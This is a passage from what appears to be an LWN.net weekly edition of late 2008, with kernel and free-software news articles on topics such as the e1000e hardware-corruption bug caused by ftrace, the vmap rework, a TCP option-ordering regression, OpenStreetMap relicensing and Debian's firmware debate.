and the attendees were able to talk to each other.  But it points out
another thing that we, as a community, lack: there are few forums where
developers and users can get together and learn from each other.
Developers tend to prefer the company of other developers; convincing them
to go to more user-oriented events can be a challenge.  So the closest
thing we have to a combined user/developer event is the single-vendor
conferences held by companies like Red Hat and Novell.  Those, needless to
say, are not the most community-oriented gatherings.  They are not the best
way to learn what our users are thinking.

The proposed LinuxCon event, to be co-located with the 2009 Linux Plumbers
Conference, may help to fill in this gap somewhat.


Our community is blessed with a wealth of interesting gatherings
worldwide.  But that doesn't mean that we can't do better.  Whether the
subject is a true pan-European Linux gathering, user-oriented conferences,
or something else altogether, there are always opportunities to find ways
to help our community be more cohesive and productive.  The trick is to
expand communications to a broader community - as seen in our newest
conference - while growing the open collaborative spirit exemplified by our
oldest one.

		The source of the e1000e corruption bug


When LWN last looked at the
e1000e hardware corruption bug, the source of 
the problem was, at best, unclear.  Problems within the driver itself
seemed like a likely culprit, but it did not take long for those chasing
this problem to realize that they needed to look further afield.  For a while, the
X server came under scrutiny, as did a number of other system components.
When the real problem was found, though, it turned out to be a surprise for
everybody involved.

Tracking down intermittent problems is hard.  When those problems result in
the destruction of hardware, finding them is even harder.  Even the most
dedicated testers tend to balk when faced with the prospect of shipping
their systems back to the manufacturer for repairs.  So the task of finding
this issue fell to Intel; engineers there locked themselves into a lab with
a box full of e1000e adapters and set about bisecting the kernel history to
identify the patch which caused the problem.  Some time (and numerous fried
adapters) later, the bisection process turned up an unlikely suspect: the
ftrace tracing framework.

Developers working on tracing generally put a lot of effort into minimizing
the impact of their code on system performance.  Every last bit of runtime
overhead is scrutinized and eliminated if at all possible.  As a general
rule, bricking the hardware is a level of overhead which goes well beyond
the acceptable parameters.  So 
the ftrace developers, once informed of the bisection result, put in some
significant work of their own to figure out what was going on.

One of the features offered by ftrace is a simple function call tracing
operation; ftrace will output a line with the called function (and
its caller) every time a function call is made.  This tracing is
accomplished by using the venerable profiling mechanism built into gcc (and
most other Unix-based compilers).  When code is compiled with the
-pg option, the compiler will place a call to mcount() at
the beginning of every function.  The version of mcount() provided
by ftrace then logs the relevant information on every call.

As noted above, though, tracing developers are concerned about overhead.
On most systems, it is almost certain that, at any given time, nobody will
be doing function call tracing.  Having all those mcount() calls
happening anyway would be a measurable drag on the system.  So the ftrace
hackers looked for a way to eliminate that overhead when it is not needed.
A naive solution to this problem might look something like the following.
Rather than put in an unconditional call to mcount(), get gcc to
add code like this:


But the kernel makes a lot of function calls, so even this version
will have a noticeable overhead; it will also bloat the size of the kernel
with all those tests.  So the favored approach tends to be different:
run-time patching.  When function tracing is not being used, the kernel
overwrites all of the mcount() calls with no-op instructions.  As
it happens, doing nothing is a highly optimized operation in contemporary
processors, so the overhead of a few no-ops is nearly zero.  Should
somebody decide to turn function tracing on, the kernel can go through and
patch all of those mcount() calls back in.

Run-time patching can solve the performance problem, but it introduces a
new problem of its own.  Changing the code underneath a running kernel is a
dangerous thing to do; extreme caution is required.  Care must be taken to
ensure that the kernel is not running in the affected code at the time,
processor caches must be invalidated, and so on.  To be safe, it is
necessary to get all other processors on the system to stop and wait while the
patching is taking place.  The end result is that patching the code is an
expensive thing to do.

The way ftrace was coded was to patch out every mcount() call
point as it was discovered through an actual call to mcount().
But, as noted above, run-time patching is very expensive, especially if it
is done a single 
function at a time.  So ftrace would make a list of mcount() call
sites, then fix up a bunch of them later on.  In that way, the cost of
patching out the calls was significantly reduced.

The problem now is that things might have changed between the time when an
mcount() call is noticed and when the kernel gets around to
patching out the call.  It would be very unfortunate if the kernel were to
patch out an mcount() call which no longer existed in the expected
place.  To be absolutely sure that unrelated data was not being corrupted,
the ftrace code used the cmpxchg operation to patch in the
no-ops.  cmpxchg atomically tests the contents of the target
memory against the caller's idea of what is supposed to be there; if the
two do not match, the target location will be left with its old value at
the end of the operation.  So the no-ops will only be written to memory if
the current contents of that memory are a call to mcount().

This all seems pretty safe, except that it fell down in one obscure, but
important case.  One obvious place where an mcount() call could go
away is in loadable modules.  This can happen if the module is unloaded, of
course, but there is another important case too: any code marked as
initialization code will be removed once initialization is complete.
So a module's initialization function (and any other code marked
__init) could leave a dangling reference in the "mcount()
calls to be patched out" list maintained by ftrace.

The final piece of this puzzle comes from this little fact: on 32-bit
architectures, memory returned from vmalloc() and
ioremap() share the same address space.  Both functions create
mappings to memory from the same range of addresses.  Space for loadable
modules is allocated with vmalloc(), so all module code is found
within this shared address space.  Meanwhile, the e1000e driver uses
ioremap() to map the adapter's I/O memory and NVRAM into the kernel's
address space.  The end result is this fatal sequence of events:


 A module is loaded into the system.  As part of the module's
     initialization, a number of mcount() calls are made; these
     call sites are noted for later patching.

 Module initialization completes, and the module's __init
     functions are removed from memory.  The address space they occupied is
     freed up for future use.

 The e1000e driver maps its I/O memory and NVRAM into the address range
     recently occupied by the above-mentioned initialization code.

 Ftrace gets around to patching out the accumulated list of
     mcount() calls.  But some of those "calls" are now, actually,
     I/O memory belonging to the e1000e device.


Remember that the ftrace code was very careful in its patching, using
cmpxchg to avoid overwriting anything which is not an
mcount() call.  But, as Steven Rostedt noted in his summary of the problem:


	The cmpxchg could have saved us in most cases (via luck) - but with
	ioremap-ed memory that was exactly the wrong thing to do - the
	results of cmpxchg on device memory are undefined.  (and will
	likely result in a write)


The end result is a write to the wrong bit of I/O memory - and a destroyed
device.

In hindsight, this bug is reasonably clear and understandable, but it's not
at all surprising that it took a long time to find.  One should note that
there were, in fact, two different bugs here.  One of them is ftrace's
attempt to write to a stale pointer.  But the other one was just as
important: the e1000e driver should never have left its hardware configured
in a mode where a single stray write could turn it into a brick.  One never
knows where things might go wrong; hardware should never be left in such a
vulnerable state if it can be helped.


The good news is that both bugs have been fixed.  The e1000e hardware was
locked down before 2.6.27 was released, and the 2.6.27.1 update disables
the dynamic ftrace feature.  The ftrace code has been significantly
rewritten for 2.6.28; it no longer records mcount() call sites on
the fly, no longer uses cmpxchg, and, one hopes, is generally
incapable of creating such mayhem again.

		Reworking vmap()


Kernel memory is normally allocated in relatively small chunks - usually
just a single page at a time.  As the size of an allocation grows,
satisfying that allocation with physically-contiguous pages gets
progressively harder.  So most of the kernel has been written with an eye
toward avoiding the use of large, contiguous allocations.  There are times,
though, when a large memory array needs to be virtually contiguous, but not
necessarily physically contiguous.  One example is the allocation of space
for loadable modules; any given module should live in a single, contiguous
address range, but nobody cares how it's laid out in physical RAM.  For
cases like this, the kernel provides a set of functions like
vmalloc() and vmap().

Functions like vmalloc() have long been known to be somewhat
expensive to use.  They have to work with a single shared (and limited)
address range, and they require making changes to the kernel's page
tables.  Page table changes, in turn, require translation lookaside buffer
(TLB) flushes, which are a costly, all-CPUs operation.  So kernel
developers have generally tried to avoid using these functions in
performance-critical parts of the kernel.

Nick Piggin has noticed, though, that the performance characteristics of
vmalloc() and friends are catching up with us.  The
vmalloc() address space is kept on a linked list and protected by
a global lock, which does not scale very well.  But the real cost is in
freeing memory regions in this space; the ensuing TLB flush must be done
using an inter-processor interrupt to every CPU, each of which must then
flush its own TLB.  People normally do not buy more CPUs unless they have
more work to run on them, so systems with more processors will, as a
general rule, be performing more mapping and freeing in the
vmalloc() range.  As systems grow, there will be more global TLB
flushes, each of which disrupts more processors.  In other words, the
amount of work grows proportional to the square of the number of processors
- meaning that everything falls down, eventually.

To make things worse, Nick has a longstanding series of patches which,
among other things, do a lot of vmap() calls to support larger
block sizes in the filesystem layer and page cache.  Merging those patches would add
significantly to the amount of time the system spends managing the
vmalloc() space, which would not be a good thing.  So fixing
vmalloc() seems like a good thing to do first.  As of 2.6.28, Nick
has, in fact, fixed the management of kernel virtual allocations.


The first step is to get rid of the linked list and its corresponding
global lock.  Instead, a red-black tree is used to track
ranges of available address space; finding a suitable region can now be
done without having to traverse a long list.  The tree is still protected
by a global lock, which poses potential scalability problems.  To avoid
this issue, Nick's patch creates a separate, per-CPU list of small
address ranges which can be allocated and freed in a lockless manner.  New
functions must be called to make use of this facility:


A call to vm_map_ram() will create a virtually-contiguous mapping
for the given pages.  The associated data structures will be
allocated on the given NUMA node; the memory will have the
protection specified in prot.  With the version of the patch
merged for 2.6.28, mappings of up to 64 pages can be made from the
per-cpu lists.

Note that these functions do not allocate memory, they just create a
virtual mapping for a given set of pages.  They are a replacement for
vmap() and vunmap(), not vmalloc() and
vfree().  It is probably possible to rewrite vmalloc() to
use this mechanism, but that has not happened.  So vmalloc() calls
still require the acquisition of a global lock.

There's another trick in this patch set which is used by all of the kernel
virtual address management functions.  Nick realized that it is not
actually necessary to flush TLBs across the system immediately after an
address range is freed.  Since those addresses are being given back to the
system, no code will be making use of them afterward, so it does not matter
if a processor's TLB contains a stale mapping for them.  All that really
matters is that the TLB gets cleaned out before those addresses are used
again elsewhere.   So unmapped regions can be allowed to accumulate, then
all flushed with a single operation.  That cuts the number of TLB flushes
significantly.

How much faster do things run?  Nicks patch (the merged version can be
found here)
contains some benchmark results.  With an artificial test aimed at demonstrating
the difference, the new code runs 25 times faster.  By changing the
vmap() code in the XFS filesystem to use vm_map_ram()
instead, some workloads were sped up by a factor of twenty.  So it seems to
work.

		Mozilla releases Firefox 3.1 Beta 1


Version 3.1 Beta 1 of the popular Mozilla
Firefox web browser was
announced
on October 14, 2008.  This is a testing release:


Firefox 3.1 Beta 1 is a public preview release intended  
for developer testing and community feedback. It includes many new  
features as well as improvements to performance, web compatibility,  
and speed. We recommend that you read the release notes and known  
issues before installing this beta.


The release announcement and the

Web Developer Feature Overview page discuss the new
capabilities in more detail.  The major new additions include:


Support has been added for the html &lt;video&gt; and &lt;audio&gt; elements using the OGG Theora and OGG Vorbis formats.
 Geolocation features have been added, but not in the Linux version (discussed here).
 The Gecko layout engine has some improved web standards implementations.
 More CSS 2.1 and CSS 3 properties have been implemented.
 Support for the CSS @font-face property has been added (Mac OS-X and Windows only), allowing support for downloadable user-specified true type fonts.
 Support for 
 Access Control for Cross-Site Requests has been added.
 Beta support for Mozilla's TraceMonkey JavaScript engine has been added.
 Some new customizations are available for controlling the Smart Location Bar.
 JavaScript web worker threads are being worked on.
 New graphics, SVG and CSS capabilities are being added.
 Improvements have been made to the browser tabs including:
 
A new "Open a new tab" button has been added to the tab bar.
   Support for switching between tabs with Ctrl-Tab has been added.
   Tabs can now be dragged and dropped between Firefox windows.
 
More features are planned for the official Mozilla 3.1 release.


Your author spent an entire day doing his normal LWN work using
Firefox 3.1 Beta 1 on an Ubuntu 8.04 system.
The only problem that showed up was
choppy and aliased audio playback when viewing some of the recommended
test videos.
Otherwise, the browser worked well.


Firefox 3.1 Beta 1 is available for download

here, it is a good idea to read the

release notes first.


		OpenStreetMap contemplates licensing


Maps are cool; there's no end of applications which can make good use of
mapping data.  There is plenty of map data around, but it's almost
exclusively proprietary in nature.  That makes this data hard to use with
free applications; it's also inherently annoying.  We, as taxpayers, own
those streets; why should we have to pay somebody else to know where the
streets are?


Your editor likes to grumble about such things; meanwhile, the OpenStreetMap project (OSM) is busily
doing something about it.  OSM has put together a database and a set of
tools making it easy for anybody to enter location data with the intent of
producing a free mapping database with global coverage.  It is an ambitious
project, to say the least, but it's working:


	Right now on each and every day, 25,000km of roads gets added to
	the OpenStreetMap database, on the historical trend that will be
	over 200,000km per day by the end of 2009. And that doesn't include
	all the other data that makes OpenStreetMap the richest dataset
	available online.


OSM data is not limited to roads; just about any point or
track of interest can be added to the database.  If current trends
continue, OSM could well grow into the most extensive geolocation database

 
anywhere - free or proprietary.  And those trends could well continue; one
of the nice aspects of this kind of project is that no particular expertise
is needed to contribute.  All you need is a GPS receiver and some time; some OSM
local groups have even acquired a set of receivers to lend out to
interested volunteers.  This is our planet, and we can all help to map it.


All this work raises an interesting question, though: under what license
should this accumulated data be distributed?  Currently, the OSM database
is covered by the Creative Commons
Attribution-ShareAlike 2.0 license.  It is a copyleft-style license,
requiring that derived products be made available under the same license.
So, for example, if a GPS navigator manufacturer were to include an
enhanced version of the OSM database in its products, it would have to
release the enhanced version under the CC by-SA license.


The OSM project is not happy with this license, though, and is looking to
make a change.  The attribution requirement is ambiguous in this context;
do users need to credit every OSM contributor?  Does making a plot of OSM
data with added data layered on top create a derived product?  But the
scariest question is a different one: can the CC by-SA license cover the
OSM database at all?


Copyright law covers creative expression, not facts.  The information in
the OSM database is almost entirely factual in nature; one cannot copyright
the location of a street corner.  So what OSM is trying to protect is not
the individual locations, but the database as a whole.  Copyright law does
allow for the protection of databases, but that law is far more complex
than the law for pure creative works, and it varies far more between
jurisdictions.  Europe has a specific (though much-derided) database right,
the US has far weaker
database protections, and other parts of the planet lack this
protection altogether.  So it may well be that, if some evil corporation
decides to appropriate the OSM database for its own nefarious, proprietary
purposes, there will be nothing that the OSM project can do about it.


So the project is thinking of making a switch to the Open
Database License (ODbL), which is still being developed.  It, too, is a
copyleft-style license, but it is crafted to make use of whatever database
protection is available in a given jurisdiction.  To that end, the ODbL is
explicitly structured as a contract between the database owner and the
user.  In any jurisdiction where database rights are not recognized under
copyright law, the
contractual nature of the ODbL should provide a legal basis to go after
license violators.

But the use of contract law muddies the water considerably; there are good
reasons why free software licenses are carefully written to avoid that
path.  Contracts are only valid if they are explicitly and voluntarily
entered into by all parties.  If the OSM cannot show that a license
violator agreed to abide by the license, it has no case under contract
law.  The project has
a plan to address this problem:


	To ensure that potential users are aware of and agree to the
	contract terms, we are proposing to require a click-through
	agreement before downloading data. (All registered users would
	agree to this on signing up so will not need a further
	click-through on each download.)


Registration and clickthrough licensing are obnoxious, to say the least.
But, in any case, the only people who will go through that process are
those who obtain the database directly from OpenStreetMap.  The ODbL allows
redistribution, naturally, and it does not require that explicit agreement
be obtained from recipients of the database.  So it is hard to see an
outcome where copies of the database lacking a "signed" contract do not
proliferate.  Additionally, reliance on contract law makes it
very hard to get injunctive relief, weakening any enforcement efforts
considerably. 


The ODbL includes an anti-DRM measure; if a vendor locks down a copy of the
database with some sort of DRM scheme, that vendor must also make an
unrestricted copy available.  This license tries to distinguish between
"collective databases" (which are not derived works) and "derivative
databases" (which are).  Drawing layers on top of an OSM-based map is a
collective work; tracing lines from such a map is a derivative work.  It
is, in general, a complex bit of work.

It is complex enough that a number of OSM contributors are wondering if
it's all worth it.  Jordan Hatcher is one of the authors of the ODbL, and
he supports its use with OSM, but even he understands the concerns that some people
have:


	The [Science Commons] point is that all this sort of stuff can be a
	real pain, and isn't what you are really doing is wanting to create
	and manipulate factual data? Why spend all the time on this when
	the innovation happens in what you can do with the data, and not
	with trying to protect the data in the first place.


There is an active group with OSM which is opposed to this kind of
licensing and would, in fact, rather just get down to the task of
collecting and distributing the data.  They express
themselves in terms like this:


	One thing I really love about OSM is the pragmatic, un-political
	approach: You don't give us your data, fine, then we create our own
	and you can shove it.

	Not: You don't give us your data, fine, then we create a complex
	legal licensing framework that will ultimately get you bogged down
	in so many requests by prospective users who would like to use our
	data and yours but cannot and you will sooner or later have to
	release your data according to the terms we dictate and then we
	will have won and the world will be a better place.


These contributors would rather that OSM release its data into the public
domain - or something very close to that.  Rather than put together a
complicated license, they prefer to just publish their data for anybody to
use as they see fit.  There have been all of the usual discussions which
resemble any "GPL vs. BSD" licensing flame war one has ever seen - except
that the OSM folks appear to be a very polite crowd.  It comes down to the
usual question: will the OSM database become more complete and useful if
those who extend it are forced to contribute back their changes?

The public domain contingent clearly does not believe that any improvements
to the database obtained via licensing constraints will be worth the
trouble.  So it seems likely that there will be some sort of fork involving
the creation of a smaller, purely public-domain OSM database.  It may well
be an in-house fork, with the public domain data being merged into the
larger, more restrictively licensed database for distribution.  Regardless
of how that goes, this split raises issues of its own: how are the two
databases to be kept distinct in the face of cooperative additions and
edits?

Any relicensing of the database also brings up another interesting
question: what to do about all of the existing data, which may or may not
be copyrighted by those who contributed or edited it?  The license change
may well require a process of getting assent from all contributors and
purging data obtained from those who do not agree.  This
proposed timeline shows how the project is thinking about working
through this task.  It is hard to imagine this process going entirely
smoothly. 


The OSM community clearly has a set of thorny issues to work out.  Given
that, it's not surprising that this process has already been dragged out
over the better part of a year.  How this issue is eventually resolved will
certainly serve as an example - not necessarily a good example - for other
projects working on free compilations of factual data.  
Let us hope that OSM can come to a
solution which lets this project continue to grow and generate a valuable
database that we all will benefit from.

		K12Linux - Fedora 9 with LTSP


The K12Linux project
builds on the efforts of K12LTSP, which
started working with the Linux Terminal Server Project (LTSP) on Red Hat Linux before switching to Fedora and
CentOS.  The newly named K12Linux project recently announced the release of K12Linux Release Candidate 1.

The Linux Terminal Server Project 
provides software that adds thin-client support to Linux distributions.
The project's documentation
page has pointers to using LTSP with Ubuntu, openSUSE, Fedora and
Debian, along with instructions for Integrating
LTSP-5 into your favorite Linux distribution.  LTSP provides server
and client software for a single server and many thin clients or diskless
terminals.  This can be an inexpensive way to provide files and
applications for many users.  While often used in schools, LTSP has many
other applications as well.

K12 refers to the USA primary school system, where children start their
education in Kindergarten (from the German) and go through grade 12 before
going on to a university.  This brings us back to K12Linux, the new name
for continuing efforts to integrate LTSP with Fedora.  Currently these
efforts are focused on LTSP 5 and Fedora 9.

This RC release contains Fedora 9 and all updates as of October 12, 2008,
with LTSP-5.1.26, ldm-2.0.13, ltspfs-0.5.5, many bug fixes and new
K12Linux-themed artwork for the login screen.  This release comes as a live
image suitable for a USB key or a DVD; both with the client chroot already
installed and configured.  If you are already running Fedora 9 and would
like to try this release you can use the instructions in the install
guide instead of the live media.  Either way, if you are looking for an
easy way to get LTSP running, give K12Linux a try.

		Closing out the 2.6.28 merge window


About 1000 changesets were merged after the previous summary was posted
here.  Much of those came from architecture-specific trees.  Other changes
merged this time around include:


 There are new drivers for 
     Mellanox ConnectX 10GbE network adapters,
     PowerPC PPC40x and PPC44x GPIO controllers,
     Panasonic "Let's Note" laptop special keys,
     Sharp SL-6000 backlight and LCD devices,
     Dialog Semiconductor DA9030/DA9034 backlight devices,
     Tabletkiosk Sahara Touch-iT backlight devices, and
     Toshiba TX4939 SoC ATA controllers.


 One more not-ready-for-prime-time driver was merged via the staging 
     tree; this one supports Redrapids Pocket Change cardbus devices.  The
     staging tree also brought an extensive set of fixes to the drivers
     added earlier in the merge window.


 The kernel has gained support for ultra-wideband
     protocol stacks.  UWB can be used for normal networking, but the
     immediate application is wireless USB, which will be
     supported in 2.6.28.


 The ACPI docking station code has gained support for bay and battery
     hotplug  events.

 The IA64 architecture now supports Xen.  Also added to IA64 is support
     for DMA remapping devices (IOMMUs).

 Support for kdump has
     been added to the PowerPC architecture.

 The 9P (Plan9) filesystem now has RDMA support.


Changes visible to kernel developers include:


 There is a new core_param() macro:


     Its purpose is to define "core" parameters and let them be
     represented in /sys/module/kernel/parameters.

 It is now possible to create a workqueue running at realtime priority
     with:


 The block driver API has changed considerably, with the inode 
     and file parameters being removed from most block device
     operations.  The new API looks like this:


    The new prototypes do away with the file and inode
    structure pointers which were passed in previous kernels.
    Note that the ioctl() method is now called without the big
    kernel lock; code needing BKL protection must explicitly define a
    locked_ioctl() function instead.

 The range timer API
     has been merged; callers can now specify a time period in which they
     would like the timeout to be delivered.  The kernel can then take
     advantage of the range to coalesce wakeups and keep the processor idle
     for longer periods.


This time around, linux-next maintainer Stephen Rothwell has put together
a list of linux-next patches
which did not get into 2.6.28.  Perhaps the biggest omission was the credentials work, which seemed
poised to go in this time around.  Other changes which failed to get merged
include the message catalog
code (which looks like it will need a change of approach) and TOMOYO Linux (which seems to be caught
up in the same old "new security module with pathname-based rules" swamp).  

Now the stabilization period starts.  Linus, perhaps, was trying to set the
tone for this development cycle when he released a much smaller and earlier
2.6.28-rc2 than would have
normally been expected.  By way of comparison: 2.6.25-rc2 had 359 patches
applied since 2.6.25-rc1.  For 2.6.26-rc2, 446 changesets were merged, and,
for 2.6.27-rc2, the count was 780.  For 2.6.28-rc2, instead, a total of 22
changes went in.  Says Linus:


	And hey, maybe we can even _continue_ the nice model of "just small
	fixes after -rc1". I know, it sounds insane, but it's a real
	pleasure to do an -rc2 with just a handful of fixes for real
	problems that real people see.  What a concept!


Should this pattern hold, it may well be that 2.6.28 will stabilize more
quickly and successfully than its predecessors.  It will, in any case, be
interesting to watch.

		Networking change causes distribution headaches


A seemingly innocuous change to the networking code that went into the
2.6.27 kernel is now 
causing trouble for various distributions. Ubuntu, Fedora, and openSUSE are
all buttoning up their 
packages for a release in the near future—with Ubuntu's due this
week—so kernel changes are not 
particularly welcome.  Unfortunately, if the problem is not addressed, some
users may never be able to download a
fix because their TCP/IP won't interoperate with some broken equipment
on the internet.


The problem stems from changes that were made to clean up the TCP option
code that were merged
back in July as part of the 2.6.27 merge window.  TCP options are
a mechanism to expand the functionality of the protocol as conditions
change.  There are a handful of commonly used options that the two
endpoints of a connection can agree to use, for things like maximum segment
size (MSS), window scaling, selective acknowledgment (SACK), and
timestamps.  Options have been added over time to provide more internet
robustness and performance as well as to support higher-bandwidth
physical connections.


A perfectly
reasonable, if unintended, consequence of the code change was that the 
the options were put into the header in a slightly different order.
According to the relevant RFCs, 
options can appear in any order in the option section of the TCP header.
But, some home and/or internet routers seem to expect a fixed order;
refusing to make connections if the order is "wrong".
In particular, it would seem that the MSS option needs to appear before the
SACK option.    


The bug was reported
to Ubuntu Launchpad in early September, but not a lot of progress was
made until it was added to the kernel.org
bugzilla in early October.  It seems to have only affected a relatively
small number of users—Red Hat's Dave Jones said that there were no
reports from users of the rawhide 2.6.27 kernel—as it was rather
hardware-specific.  This made it difficult to track down for the majority
of folks who couldn't reproduce it.  Ubuntu user Aldo Maggi, who filed the
kernel bug, 
sets a marvelous example of how to work with the kernel hackers to track
down the problem as can be seen in the bugzilla entry.


Eventually, the option re-ordering problem was discovered and a patch was submitted by Ilpo Järvinen that
restored the order of the options.  Along the way, with help from
Mandriva, 
it was discovered that
turning off TCP timestamps by way of:

worked around the problem without changing the kernel—at the cost of
losing the TCP timestamp functionality.


So it would seem that the problem has been solved—the patch has been
merged
into Linus Torvalds's tree for 2.6.28—but there are still a few
unresolved issues.  The three distributions that are preparing new releases
are all based on 2.6.27, but as yet, there has not been a -stable kernel
release that picks up the patch, though it is likely to come fairly soon.


In the meantime, Fedora has added the patch to its kernel in rawhide, so
Fedora 10 (and eventually Fedora 9 when it gets rebased on 2.6.27) will
have the fix.  openSUSE is waiting a bit to see what gets submitted by the
kernel networking developers to the
-stable team.  As Novell/SUSE kernel hacker Greg Kroah-Hartman puts it:
"We still have a while to go before the final 11.1 
kernel is released, so we feel no pressure here."  Unfortunately,
Ubuntu got caught very late in its release cycle as 8.10 (or Intrepid Ibex)
is due on October 30.


The original plan as outlined
by Debian/Ubuntu hacker Steve Langasek was to note the problem in the
release notes
for 8.10, but not address the underlying problem until after the release:

The kernel fix is known upstream; implementing it requires kernel uploads
and installer rebuilds, which it's just not possible to fit in between the
release candidate and the release. We will certainly want to include this
fix in a kernel update as soon as possible after the release, but this is
unfortunately in a class of bugs that we can't fix the week of release (even
turning timestamps off requires a kernel upload, unless we want to
permanently disable tcp timestamp support for Ubuntu 8.10).


That led many in the Launchpad bug thread to note that it was going to be
a real mess, especially for the least technical of users.  Nick Lowe sums
up the problem:

[...] You should really delay for this if you need more time...

RC shouldn't mean Release ComeHellOrHighWater

The users who are most likely to hit this are home users behind their
aged/unmaintained consumer routers who are highly unlikely to understand
why they can't access the Web and will just go elsewhere... 


Certainly, the release notes are not the first place an affected user would
go if they ran into the problem.  More than likely, they would just decide that
Ubuntu—by extension Linux—is simply broken, so it is a relief
to see
that Ubuntu eventually relented.  For 8.10, the procps package has
been changed to work around the problem by turning off timestamps.  Once a
new kernel package is released with the re-ordering patch included,
timestamps can presumably be restored.


This kind of problem—where affected users may not be able to retrieve an
update to fix it—should really be part of the definition of a
show-stopping (i.e. release date slipping) problem. It was rather galling
to some that Ubuntu
would consider shipping with this known issue, simply to make its 8.10
release in the 10th month of 2008 (which is how Ubuntu releases are numbered).


Ubuntu is justifiably proud of its record of shipping releases on time, but
it cannot do that at the expense of its users.  While the workaround that
was implemented was suboptimal, perhaps, it does ensure that
users—especially non-technical users—won't find that web
surfing doesn't work in Linux.  It should also allow Ubuntu to release on
schedule. 


[ Thanks to Nick Lowe for giving us a heads-up about this issue. ]

		Tracking tbench troubles


Kernel developers tend to have a mixed view of benchmarks.
A benchmarking tool can do an effective job of quantifying specific aspects
of system performance.  But benchmarks are not real workloads; optimizing
for a benchmark can often distort a system in ways which are detrimental to
real applications.  Since kernel hackers do not always see benchmark optimization
as their top priority, they can sometimes assign a lower priority to
benchmark regressions as well.  But, sometimes, benchmark problems indicate
a real problem in the kernel.


The tbench benchmark is meant to measure networking performance; it
consists of a collection of processes quickly making lots of small requests
from a server process.  Since the requests are small, there is not much
time spent actually moving data; it's all a matter of shifting small
packets around - and scheduling between the processes.  Back in August,
Christoph Lameter reported
that tbench performance in the mainline kernel had been declining for some
time.  His system was able to move 3208 MB/sec with a 2.6.22 kernel,
but only 2571 MB/sec with a 2.6.27-rc kernel.  Each of the releases in
between showed a decline from the one which came before, with 2.6.25
showing an especially big hit.  Others were able to reproduce the results,
and they engaged in various rounds of speculation on where the problem
might be, but it seems that, initially, nobody actually dug into the
system to see what was going on. 


At linux.conf.au 2007, Andi Kleen gave a talk describing various types of
kernel hackers.  One of those was the "Russian mathematician" who, he
suspected, was often a room full of talented developers operating under a
single name.  Evgeniy Polyakov can only have reinforced that view when, in
early October, he tracked down the biggest
offending commit through a process which, he says, involved "just [a]
couple of hundreds of compilations."  In the process, he put together a plot of tbench performance
which, he says, is suitable for scaring children.  Through a massive amount
of work, he was able to point the finger at a scheduler patch - not
something in the networking stack at all.


In particular, Evgeniy found that the patch adding high-resolution
preemption ticks was the problem.  The idea behind this patch was to make
time slices more accurate by scheduling preemption at just the right time.
It makes sense; once the regular clock tick has been eliminated, there is
no reason not to arrange for preemption to happen when the scheduling
algorithm says it should.  Unfortunately, it seems that this change also
adds sufficient overhead to slow down tbench performance considerably; when
Evgeniy backed it out, his performance went from 373 MB/sec to
455 MB/sec.  That would seem to be a pretty clear indication that
something is amiss with high-resolution preemption ticks.


At this point, the public discussion went quiet, though it appears that a number
of developers were working on it off-list.  David Miller eventually tracked
down the worst of the trouble to the wakeup code, something he was rather vocally unhappy about having had to
do.  Eventually a patch was merged (for 2.6.28-rc2) disabling the
high-resolution preemption tick feature.  Since the discussion is private,
it's not quite clear why this change took as long as it did.  But there's a
couple of plausible reasons.  One is that this particular feature is
disabled by default anyway, so most users will not encounter the
performance problem it creates.  

But there is also the question of weighing the benchmark result against the
effects on other, "real" workloads.  Ingo Molnar said:


	But it's a difficult call with no silver bullets. On one hand we
	have folks putting more and more stuff into the context-switching
	hotpath on the (mostly valid) point that the scheduler is a
	slowpath compared to most other things. On the other hand we've got
	folks doing high-context-switch ratio benchmarks and complaining
	about the overhead whenever something goes in that improves the
	quality of scheduling of a workload that does not context-switch as
	massively as tbench. It's a difficult balance and we cannot satisfy
	both camps.


So, by this view, performance on scheduler-intensive benchmarks must be
weighed against the wider value of other scheduler enhancements.  David
Miller has a different view of the
situation, though:


	If we now think it's ok that picking which task to run is more
	expensive than writing 64 bytes over a TCP socket and then blocking
	on a read, I'd like to stop using Linux. :-) That's "real work" and
	if the scheduler is more expensive than "real work" we lose.


In David's view, scheduler performance has been getting consistently worse
since the switch to the completely fair scheduler in 2.6.23.  He would like
to see some energy put into recovering some of the performance of the
pre-CFS scheduler; in particular, he thinks that Ingo and company should
work to fix (what he sees as) a regression that they caused.

For the time being, the worst performance regression has been "fixed" by
disabling the high-resolution preemption tick feature; Ingo says that the
feature will not come back until it can be supported without slowing
things down.  But the scheduler seems to have gotten slower in a number of
other ways as well.  Your editor will make a prediction here: now that the
issue has been called out in such clear terms, somebody will find the time
to fix these problems to the point that the CFS scheduler will be faster
than the O(1) scheduler which preceded it.

Beyond that, there are suggestions that the
scheduler cannot take the blame for all of the observed regressions in
tbench results.  So developers will have to look at the rest of the system
to figure out what's going on.  The good news is that this is a clear
challenge with an 
objective way to measure success.  Once a problem reaches that level of
clarity, it's usually just a matter of some hacking.

		Debian's election season: old firmware and new contributors


Longtime LWN readers will be aware of your editor's tendency toward the
publishing of wild predictions at the beginning of each year.  The 2007 predictions irritated some
Debian developers and users by suggesting that, after getting the Etch
release out the door, the project would go back to arguing about
firmware issues.  At the end of the year, it became necessary to
acknowledge that this prediction, like so many others, had failed to come
to pass.  In retrospect, the error in this prediction was obvious: the
Debian Project traditionally saves the firmware argument for the end of the
release process.  After all, they need to find some way to delay a
release once it's looking close to ready.

The problem with firmware, of course, is that it is a binary blob lacking
the corresponding source, and, sometimes, even a license allowing its
distribution.  Many developers and users see that blob as being part of the
hardware; as long as the blob is distributable, it does not bother them.
Others, though, regard firmware blobs as proprietary software and their
incorporation into the kernel as a GPL violation.  The Debian Project,
which promises to deliver a 100% free distribution to its users, houses
many developers from the latter camp.  These developers, who see firmware
distribution as a violation of the project's social contract, can be
counted upon to raise the issue each release cycle.

In 2004, the project responded by passing a general resolution
suspending some social contract provisions through September 1 of that
year on the
reasoning that it would be long enough to get the Sarge release done.
Putting a date on a Debian release tends to be a mistake, though; Sarge was
not finished until June, 2005.  By unspoken consensus, that date was
somehow deemed to have fallen before September 1, 2004.  In 2006, the
project voted again
on firmware.  Having learned from experience, the exception they allowed
this time lacked a date, simply saying that the presence of binary-only
firmware in the Etch release was something the project was willing to
tolerate.


The 2008 discussion started when Ben Finney
pointed out that a number of firmware-related entries in the Debian bug
tracking system had been quietly marked "lenny-ignore" - not relevant to
the upcoming Lenny release.  This action, many have subsequently argued,
runs counter to the social contract and constitution, which do not allow
the shipping of non-free software to be swept under the carpet in this way.
They would, instead, like to see the kernel team remove the (relatively
few) firmware blobs remaining in the kernel.  Such a change, it is said,
should be relatively easy; recent changes within the kernel are
helpful in this regard - though said changes became available in 2.6.27,
